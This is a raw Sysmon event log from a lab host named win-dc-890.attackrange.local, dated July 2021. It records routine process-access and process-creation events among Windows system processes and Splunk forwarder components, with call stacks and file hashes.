07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.934{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.918{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F496-60EB-297D-00000000CF01}10208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.918{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.918{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.918{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.918{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F496-60EB-297D-00000000CF01}10208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.918{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.918{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F496-60EB-297D-00000000CF01}10208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.903{466BC892-F496-60EB-297D-00000000CF01}10208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001048649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.751{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.751{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.751{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.751{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.751{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.751{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.454{466BC892-F496-60EB-287D-00000000CF01}76761072C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.234{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F496-60EB-287D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.234{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.234{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 